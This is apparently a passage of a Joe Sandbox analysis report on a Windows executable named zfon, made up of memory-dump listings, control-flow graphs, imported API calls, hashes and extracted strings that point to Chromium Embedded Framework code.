                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InfoLocale___lc_locale_name_func__crt
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2625200093-0
                                                                                                                                                                            • Opcode ID: 452bc398865e805a221a8c6e4f8b9859baf2ce5d8fdd9b436033a1a2ba9836ed
                                                                                                                                                                            • Instruction ID: 8d662879f9ad15e4550b1b6d9e4b59257de4a2482da6869818e311ca04d2cc6b
                                                                                                                                                                            • Opcode Fuzzy Hash: 452bc398865e805a221a8c6e4f8b9859baf2ce5d8fdd9b436033a1a2ba9836ed
                                                                                                                                                                            • Instruction Fuzzy Hash: C3F0A7BE62964247E7549F64D0D06A56370E788710FC06035EE4A52299CB58D8CACF10
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Time$FileSystem
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2086374402-0
                                                                                                                                                                            • Opcode ID: cc3fefdac151d0d6c1831a70d1ab07d2dc3f3163a8702bb6ad1aa6244e1ccde4
                                                                                                                                                                            • Instruction ID: 13b807798c8569baf75774d3a9722e8788f23855de0608b71b631c5acfe4724f
                                                                                                                                                                            • Opcode Fuzzy Hash: cc3fefdac151d0d6c1831a70d1ab07d2dc3f3163a8702bb6ad1aa6244e1ccde4
                                                                                                                                                                            • Instruction Fuzzy Hash: 64E0BF7662954487DB81CF69F49051AB7A0FB88B84B446021FA9B87B18DA3CD4548F00

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1014 7ffbc1b194cc-7ffbc1b194fd 1015 7ffbc1b19a93-7ffbc1b19aa5 1014->1015 1016 7ffbc1b19503-7ffbc1b19521 1014->1016 1017 7ffbc1b19aa8-7ffbc1b19aab call 7ffbc1b179dc 1015->1017 1018 7ffbc1b1963c-7ffbc1b1963f 1016->1018 1019 7ffbc1b19527 1016->1019 1026 7ffbc1b19ab0-7ffbc1b19acc 1017->1026 1021 7ffbc1b19641-7ffbc1b19665 call 7ffbc1b1aadc 1018->1021 1022 7ffbc1b19676-7ffbc1b1967d 1018->1022 1023 7ffbc1b1952d-7ffbc1b19530 1019->1023 1024 7ffbc1b1962a-7ffbc1b19637 1019->1024 1040 7ffbc1b199d5-7ffbc1b199d9 1021->1040 1043 7ffbc1b1966b-7ffbc1b19671 1021->1043 1030 7ffbc1b1967f-7ffbc1b19682 1022->1030 1031 7ffbc1b19689-7ffbc1b19690 1022->1031 1028 7ffbc1b19532 1023->1028 1029 7ffbc1b195a8-7ffbc1b195ad 1023->1029 1025 7ffbc1b199cc-7ffbc1b199d0 call 7ffbc1b17494 1024->1025 1025->1040 1036 7ffbc1b19560-7ffbc1b1956d 1028->1036 1037 7ffbc1b19534-7ffbc1b19537 1028->1037 1033 7ffbc1b195af-7ffbc1b195b2 1029->1033 1034 7ffbc1b19618-7ffbc1b19625 1029->1034 1030->1031 1038 7ffbc1b197a0-7ffbc1b197a3 1031->1038 1039 7ffbc1b19696 1031->1039 1041 7ffbc1b195eb-7ffbc1b19613 call 7ffbc1b17a60 1033->1041 1042 7ffbc1b195b4-7ffbc1b195b7 1033->1042 1034->1025 1036->1025 1046 7ffbc1b19596-7ffbc1b195a3 1037->1046 1047 7ffbc1b19539-7ffbc1b1953c 1037->1047 1044 7ffbc1b19920-7ffbc1b19923 1038->1044 1045 7ffbc1b197a9 1038->1045 1048 7ffbc1b1969c-7ffbc1b1969f 1039->1048 1049 7ffbc1b1978e-7ffbc1b1979b 1039->1049 1052 7ffbc1b199db-7ffbc1b199e2 1040->1052 1053 7ffbc1b19a0a-7ffbc1b19a11 1040->1053 1041->1040 1055 7ffbc1b195d5-7ffbc1b195e6 call 7ffbc1b17494 1042->1055 1056 7ffbc1b195b9-7ffbc1b195bc 1042->1056 1043->1026 1060 7ffbc1b199bf 1044->1060 1061 7ffbc1b19929-7ffbc1b1992c 1044->1061 1057 7ffbc1b1990e-7ffbc1b1991b 1045->1057 1058 7ffbc1b197af-7ffbc1b197b2 1045->1058 1046->1025 1047->1046 1059 7ffbc1b1953e-7ffbc1b19541 1047->1059 1050 7ffbc1b196a5 1048->1050 1051 7ffbc1b19747-7ffbc1b1974a 1048->1051 1049->1025 1063 7ffbc1b196ab-7ffbc1b196ae 1050->1063 1064 7ffbc1b1977f-7ffbc1b19789 1050->1064 1051->1064 1065 7ffbc1b1974c-7ffbc1b1974f 1051->1065 1066 7ffbc1b199e4-7ffbc1b199e8 1052->1066 1067 7ffbc1b199fa-7ffbc1b19a08 1052->1067 1069 7ffbc1b19a18-7ffbc1b19a4d call 7ffbc1b17680 call 7ffbc1b179dc 1053->1069 1055->1041 1070 7ffbc1b195be-7ffbc1b195c1 1056->1070 1071 7ffbc1b195cd-7ffbc1b195d0 1056->1071 1057->1025 1072 7ffbc1b1980b 1058->1072 1073 7ffbc1b197b4-7ffbc1b197b7 1058->1073 1059->1046 1074 7ffbc1b19543-7ffbc1b19546 1059->1074 1075 7ffbc1b199c6 1060->1075 1076 7ffbc1b1992e-7ffbc1b19931 1061->1076 1077 7ffbc1b19967-7ffbc1b199bd call 7ffbc1b1c550 call 7ffbc1b17680 call 7ffbc1b179dc 1061->1077 1089 7ffbc1b19734-7ffbc1b19742 call 7ffbc1b17940 1063->1089 1090 7ffbc1b196b4-7ffbc1b196b7 1063->1090 1064->1025 1078 7ffbc1b19770-7ffbc1b1977a 1065->1078 1079 7ffbc1b19751-7ffbc1b19754 1065->1079 1080 7ffbc1b19a50-7ffbc1b19a53 1066->1080 1081 7ffbc1b199ea-7ffbc1b199f2 1066->1081 1067->1069 1069->1080 1070->1071 1093 7ffbc1b195c3-7ffbc1b195c6 1070->1093 1091 7ffbc1b19810-7ffbc1b19827 1071->1091 1072->1091 1083 7ffbc1b197f9-7ffbc1b19806 1073->1083 1084 7ffbc1b197b9-7ffbc1b197bc 1073->1084 1085 7ffbc1b19584-7ffbc1b19591 1074->1085 1086 7ffbc1b19548-7ffbc1b1954b 1074->1086 1075->1025 1087 7ffbc1b1995b-7ffbc1b19965 1076->1087 1088 7ffbc1b19933-7ffbc1b19936 1076->1088 1077->1040 1078->1025 1079->1078 1094 7ffbc1b19756-7ffbc1b19759 1079->1094 1097 7ffbc1b19a84-7ffbc1b19a91 1080->1097 1098 7ffbc1b19a55-7ffbc1b19a7f call 7ffbc1b18c5c call 7ffbc1b179dc call 7ffbc1b17ae0 1080->1098 1081->1080 1095 7ffbc1b199f4-7ffbc1b199f8 1081->1095 1083->1025 1099 7ffbc1b197be-7ffbc1b197c1 1084->1099 1100 7ffbc1b197ea-7ffbc1b197f4 1084->1100 1085->1025 1086->1085 1101 7ffbc1b1954d-7ffbc1b19550 1086->1101 1087->1025 1102 7ffbc1b1994c-7ffbc1b1994f 1088->1102 1103 7ffbc1b19938-7ffbc1b1993b 1088->1103 1089->1040 1104 7ffbc1b196f2-7ffbc1b1972f call 7ffbc1b194cc call 7ffbc1b17680 1090->1104 1105 7ffbc1b196b9-7ffbc1b196bc 1090->1105 1106 7ffbc1b19888-7ffbc1b1988b 1091->1106 1107 7ffbc1b19829-7ffbc1b1984c call 7ffbc1b1c9d4 1091->1107 1093->1071 1109 7ffbc1b195c8-7ffbc1b195cb 1093->1109 1112 7ffbc1b1975b-7ffbc1b1975e 1094->1112 1113 7ffbc1b19764-7ffbc1b1976b 1094->1113 1095->1067 1095->1080 1097->1026 1098->1097 1116 7ffbc1b197c3-7ffbc1b197c6 1099->1116 1117 7ffbc1b197d8-7ffbc1b197e5 1099->1117 1100->1025 1118 7ffbc1b19572-7ffbc1b1957f 1101->1118 1119 7ffbc1b19552-7ffbc1b19555 1101->1119 1102->1087 1103->1102 1120 7ffbc1b1993d-7ffbc1b19947 1103->1120 1104->1017 1121 7ffbc1b196be-7ffbc1b196c1 1105->1121 1122 7ffbc1b196e0-7ffbc1b196ed 1105->1122 1126 7ffbc1b1988d-7ffbc1b19895 1106->1126 1127 7ffbc1b198f3-7ffbc1b19909 call 7ffbc1b1c9d4 1106->1127 1145 7ffbc1b1984e-7ffbc1b19876 call 7ffbc1b17a60 1107->1145 1146 7ffbc1b19879-7ffbc1b19883 1107->1146 1109->1021 1109->1071 1112->1113 1112->1120 1113->1075 1116->1120 1133 7ffbc1b197cc-7ffbc1b197d3 1116->1133 1117->1025 1118->1025 1119->1118 1134 7ffbc1b19557-7ffbc1b1955a 1119->1134 1120->1025 1121->1122 1135 7ffbc1b196c3-7ffbc1b196c6 1121->1135 1122->1025 1128 7ffbc1b19897-7ffbc1b198ad call 7ffbc1b17494 1126->1128 1129 7ffbc1b198d9-7ffbc1b198db 1126->1129 1127->1026 1128->1127 1155 7ffbc1b198af-7ffbc1b198d7 call 7ffbc1b17a60 1128->1155 1129->1127 1140 7ffbc1b198dd-7ffbc1b198ee call 7ffbc1b17494 1129->1140 1133->1075 1134->1021 1134->1036 1143 7ffbc1b196d1-7ffbc1b196db 1135->1143 1144 7ffbc1b196c8-7ffbc1b196cb 1135->1144 1140->1127 1143->1025 1144->1120 1144->1143 1145->1146 1146->1026 1155->1127
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                                            • API String ID: 2943138195-1482988683
                                                                                                                                                                            • Opcode ID: 42bd956a0521df0bb215b1c300124c972e1b6c0f845a56a9a1a0b204cefc3c34
                                                                                                                                                                            • Instruction ID: e3377bfa83c5c9cb120703ac07975ecdeda6f8769a5d77e2c97271776e219ec6
                                                                                                                                                                            • Opcode Fuzzy Hash: 42bd956a0521df0bb215b1c300124c972e1b6c0f845a56a9a1a0b204cefc3c34
                                                                                                                                                                            • Instruction Fuzzy Hash: F30283FAE1869388FB148F74D8942BE37B1BB05384F622535DA0D76A98DF3CA545CB40

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1372 7ff79cfc65b0-7ff79cfc6627 cef_string_map_alloc 1373 7ff79cfc662d-7ff79cfc670c call 7ff79cfb3ee0 * 3 call 7ff79cfdb3e0 1372->1373 1374 7ff79cfc67ec-7ff79cfc67f0 1372->1374 1467 7ff79cfc6716-7ff79cfc671b 1373->1467 1468 7ff79cfc670e-7ff79cfc6711 1373->1468 1375 7ff79cfc67f2-7ff79cfc67fe call 7ff79cfdb4d0 1374->1375 1376 7ff79cfc67ff-7ff79cfc6803 1374->1376 1375->1376 1378 7ff79cfc6881-7ff79cfc688c 1376->1378 1379 7ff79cfc6805-7ff79cfc6813 1376->1379 1382 7ff79cfc68c5-7ff79cfc68c9 1378->1382 1383 7ff79cfc688e-7ff79cfc689e 1378->1383 1384 7ff79cfc6815-7ff79cfc6825 1379->1384 1385 7ff79cfc6868-7ff79cfc687a 1379->1385 1391 7ff79cfc6947-7ff79cfc694b 1382->1391 1392 7ff79cfc68cb-7ff79cfc68d9 1382->1392 1383->1382 1387 7ff79cfc68a0-7ff79cfc68a5 1383->1387 1388 7ff79cfc6863 call 7ff79d073d80 1384->1388 1389 7ff79cfc6827-7ff79cfc682a 1384->1389 1385->1378 1393 7ff79cfc68a7-7ff79cfc68b6 cef_string_map_alloc call 7ff79d073c7c 1387->1393 1394 7ff79cfc68bb-7ff79cfc68c0 1387->1394 1388->1385 1395 7ff79cfc6833-7ff79cfc683a 1389->1395 1396 7ff79cfc682c-7ff79cfc6832 _invalid_parameter_noinfo_noreturn 1389->1396 1397 7ff79cfc6984-7ff79cfc6988 1391->1397 1398 7ff79cfc694d-7ff79cfc695d 1391->1398 1399 7ff79cfc692e-7ff79cfc6940 1392->1399 1400 7ff79cfc68db-7ff79cfc68eb 1392->1400 1393->1394 1394->1382 1403 7ff79cfc6843-7ff79cfc684a 1395->1403 1404 7ff79cfc683c-7ff79cfc6842 _invalid_parameter_noinfo_noreturn 1395->1404 1396->1395 1409 7ff79cfc6a06-7ff79cfc6a0a 1397->1409 1410 7ff79cfc698a-7ff79cfc6998 1397->1410 1398->1397 1405 7ff79cfc695f-7ff79cfc6964 1398->1405 1399->1391 1407 7ff79cfc6929 call 7ff79d073d80 1400->1407 1408 7ff79cfc68ed-7ff79cfc68f0 1400->1408 1414 7ff79cfc6853-7ff79cfc6857 1403->1414 1415 7ff79cfc684c-7ff79cfc6852 _invalid_parameter_noinfo_noreturn 1403->1415 1404->1403 1412 7ff79cfc6966-7ff79cfc6975 cef_string_map_alloc call 7ff79d073c7c 1405->1412 1413 7ff79cfc697a-7ff79cfc697f 1405->1413 1407->1399 1417 7ff79cfc68f2-7ff79cfc68f8 _invalid_parameter_noinfo_noreturn 1408->1417 1418 7ff79cfc68f9-7ff79cfc6900 1408->1418 1419 7ff79cfc6a33-7ff79cfc6a3a 1409->1419 1420 7ff79cfc6a0c-7ff79cfc6a17 1409->1420 1421 7ff79cfc699a-7ff79cfc69aa 1410->1421 1422 7ff79cfc69ed-7ff79cfc69ff 1410->1422 1412->1413 1413->1397 1427 7ff79cfc6860 1414->1427 1428 7ff79cfc6859-7ff79cfc685f _invalid_parameter_noinfo_noreturn 1414->1428 1415->1414 1417->1418 1429 7ff79cfc6902-7ff79cfc6908 _invalid_parameter_noinfo_noreturn 1418->1429 1430 7ff79cfc6909-7ff79cfc6910 1418->1430 1423 7ff79cfc6a52-7ff79cfc6a59 1419->1423 1424 7ff79cfc6a3c-7ff79cfc6a51 1419->1424 1420->1419 1431 7ff79cfc6a19-7ff79cfc6a1d 1420->1431 1432 7ff79cfc69e8 call 7ff79d073d80 1421->1432 1433 7ff79cfc69ac-7ff79cfc69af 1421->1433 1422->1409 1436 7ff79cfc6a71-7ff79cfc6a77 1423->1436 1437 7ff79cfc6a5b-7ff79cfc6a70 1423->1437 1424->1423 1427->1388 1428->1427 1429->1430 1440 7ff79cfc6912-7ff79cfc6918 _invalid_parameter_noinfo_noreturn 1430->1440 1441 7ff79cfc6919-7ff79cfc691d 1430->1441 1431->1419 1439 7ff79cfc6a1f-7ff79cfc6a32 cef_string_map_alloc call 7ff79d073c7c 1431->1439 1432->1422 1434 7ff79cfc69b1-7ff79cfc69b7 _invalid_parameter_noinfo_noreturn 1433->1434 1435 7ff79cfc69b8-7ff79cfc69bf 1433->1435 1434->1435 1444 7ff79cfc69c1-7ff79cfc69c7 _invalid_parameter_noinfo_noreturn 1435->1444 1445 7ff79cfc69c8-7ff79cfc69cf 1435->1445 1447 7ff79cfc6a8f-7ff79cfc6a95 1436->1447 1448 7ff79cfc6a79-7ff79cfc6a8e 1436->1448 1437->1436 1439->1419 1440->1441 1442 7ff79cfc691f-7ff79cfc6925 _invalid_parameter_noinfo_noreturn 1441->1442 1443 7ff79cfc6926 1441->1443 1442->1443 1443->1407 1444->1445 1452 7ff79cfc69d1-7ff79cfc69d7 _invalid_parameter_noinfo_noreturn 1445->1452 1453 7ff79cfc69d8-7ff79cfc69dc 1445->1453 1455 7ff79cfc6a97-7ff79cfc6aac 1447->1455 1456 7ff79cfc6aad-7ff79cfc6ad8 call 7ff79d073d20 1447->1456 1448->1447 1452->1453 1459 7ff79cfc69e5 1453->1459 1460 7ff79cfc69de-7ff79cfc69e4 _invalid_parameter_noinfo_noreturn 1453->1460 1455->1456 1459->1432 1460->1459 1469 7ff79cfc6720-7ff79cfc6725 1467->1469 1470 7ff79cfc671d 1467->1470 1468->1467 1471 7ff79cfc672a-7ff79cfc67e9 call 7ff79cfbbf00 * 2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z call 7ff79cfbbf00 * 5 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z call 7ff79cfbbf00 * 2 1469->1471 1472 7ff79cfc6727 1469->1472 1470->1469 1471->1374 1472->1471
                                                                                                                                                                            APIs
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFC6620
                                                                                                                                                                            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF79CFC6770
                                                                                                                                                                            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF79CFC67BE
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC682C
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC683C
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC684C
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC6859
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFC68A7
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC68F2
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC6902
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC6912
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC691F
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFC6966
                                                                                                                                                                              • Part of subcall function 00007FF79CFDB3E0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF79CFDB43B
                                                                                                                                                                              • Part of subcall function 00007FF79CFDB3E0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF79CFDB46C
                                                                                                                                                                              • Part of subcall function 00007FF79CFDB3E0: GetLastError.KERNEL32 ref: 00007FF79CFDB49E
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC69B1
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC69C1
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC69D1
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFC69DE
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFC6A1F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@cef_string_map_alloc$??6?$basic_ostream@V01@$??0?$basic_ostream@??0?$basic_streambuf@D@std@@@1@_ErrorLastV?$basic_streambuf@
                                                                                                                                                                            • String ID: browser=$ frame=$ request=$ response.status=$ response.statusText=$?$[OnResourceResponse]$c:\projects\hydra\main\code\contrib\contrib\scene\src\source\cef\client_handler_impl.cpp
                                                                                                                                                                            • API String ID: 2865712288-1385742800
                                                                                                                                                                            • Opcode ID: 53f7230bd971caf00079091c7a204c7fedf6cfb11e5048e3a44c5828b7dca608
                                                                                                                                                                            • Instruction ID: bbdb8efaad4963a9a3c197c13e13d5bf330871f054e45e9d85b707e98ca3951a
                                                                                                                                                                            • Opcode Fuzzy Hash: 53f7230bd971caf00079091c7a204c7fedf6cfb11e5048e3a44c5828b7dca608
                                                                                                                                                                            • Instruction Fuzzy Hash: DAE17172A0CA8685EF24EB75E4543A9A772FF84B94F844535DA8D07BA9DF3CD484C320
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$free$cef_string_map_allocmemcpy$mallocmemmove
                                                                                                                                                                            • String ID: writeCertHolder
                                                                                                                                                                            • API String ID: 614388589-1003169611
                                                                                                                                                                            • Opcode ID: c14c586a15bddfdb8530b59ebaa6b24ae1ffb11342b534e436a16f3ce6ed9210
                                                                                                                                                                            • Instruction ID: 2190a869d31918c829a51d82ebd2e46986ac144a9d6c5ae4b3aec6547ad950a2
                                                                                                                                                                            • Opcode Fuzzy Hash: c14c586a15bddfdb8530b59ebaa6b24ae1ffb11342b534e436a16f3ce6ed9210
                                                                                                                                                                            • Instruction Fuzzy Hash: D2128023B09A4284EF20EF75D4943ADA7B2EB44B94F949436DE4E57BA9DF38D444C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                                                                                            • String ID: back$forward$reload$scene
                                                                                                                                                                            • API String ID: 547729093-2287126960
                                                                                                                                                                            • Opcode ID: a8aca4584c3d962fcf05249f3a7c424cd5c02abbafb34db45185e955f1eff7d9
                                                                                                                                                                            • Instruction ID: e85b6b12072c7af494b4b91b4fbf9e048c9004a940c6d7032e105a8fe0b0d170
                                                                                                                                                                            • Opcode Fuzzy Hash: a8aca4584c3d962fcf05249f3a7c424cd5c02abbafb34db45185e955f1eff7d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 6D127B63B49A4685EF20EBB5C4543BCA3B2AF85B98F858431CE4D5BB99DF38D405C360
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
